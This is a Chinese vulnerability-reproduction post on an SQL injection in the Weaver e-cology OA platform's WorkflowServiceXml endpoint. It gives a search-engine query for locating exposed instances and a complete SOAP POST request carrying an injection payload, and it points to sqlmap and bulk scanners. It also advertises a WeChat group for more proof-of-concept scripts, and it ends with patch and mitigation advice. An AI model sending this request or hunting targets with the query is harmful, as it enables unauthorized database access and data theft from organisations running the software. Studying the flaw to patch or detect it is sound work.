【漏洞复现】泛微E-Cology WorkflowServiceXml SQL注入漏洞

0x01 产品简介

泛微e-cology是一款由泛微网络科技开发的协同管理平台,支持人力资源、财务、行政等多功能管理和移动办公。

0x02 漏洞概述

泛微OAE-Cology 接口/services/WorkflowServiceXml 存在SQL注入漏洞,可获取数据库权限,导致数据泄露。

0x03 搜索引擎

bash 复制代码
app="泛微-OA(e-cology)"

0x04 漏洞复现

bash 复制代码
POST /services/WorkflowServiceXml HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.54 Safari/537.36
Content-Type: text/xml
Accept-Encoding: gzip
Content-Length: 487

<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:web="http://webservices.workflow.weaver"> <soapenv:Header/>
  <soapenv:Body>
      <web:getHendledWorkflowRequestList>
        <web:in0>1</web:in0>
        <web:in1>1</web:in1>
        <web:in2>1</web:in2>
        <web:in3>1</web:in3>
        <web:in4>
            <web:string>1=1 AND 5615=5615</web:string>
        </web:in4>
      </web:getHendledWorkflowRequestList>
  </soapenv:Body>
</soapenv:Envelope>

sqlmap验证

0x05 工具批量

nuclei

afrog

xray

POC脚本获取

请使用VX扫一扫加入内部POC脚本分享圈子

0x06 修复建议

1、官方已发布升级补丁包,支持在线升级和离线补丁安装

https://www.weaver.com.cn/cs/securityDownload.html?src=cn

2、临时解决方案

使用WAF等安全设备进行防护。

在不影响业务的情况下配置URL访问控制策略。

限制访问来源地址,如非必要,不要将系统开放在互联网上。

相关推荐
养生技术人1 天前
Oracle OCP认证考试题目详解082系列第48题
运维·数据库·sql·oracle·database·开闭原则·ocp
工作中的程序员1 天前
hive sql优化基础
hive·sql
杨云龙UP1 天前
小工具大体验:rlwrap加持下的Oracle/MySQL/SQL Server命令行交互
运维·服务器·数据库·sql·mysql·oracle·sqlserver
阿巴~阿巴~1 天前
使用 C 语言连接 MySQL 客户端(重点)
服务器·数据库·sql·mysql·ubuntu
清水加冰1 天前
【MySQL】SQL调优-如何分析SQL性能
数据库·sql·mysql
风跟我说过她1 天前
CentOS 7 环境下 MySQL 5.7 深度指南:从安装、配置到基础 SQL 操作
sql·mysql·centos
编程充电站pro1 天前
SQL 面试题解析:如何用多表查询写用户订单统计?
数据库·sql
编程充电站pro2 天前
SQL 面试高频:INNER JOIN vs LEFT JOIN 怎么考?
数据库·sql
这周也會开心2 天前
SQL-窗口函数做题总结
数据库·sql
编程充电站pro2 天前
面试陷阱:SQL 子查询 vs JOIN 的性能差异
数据库·sql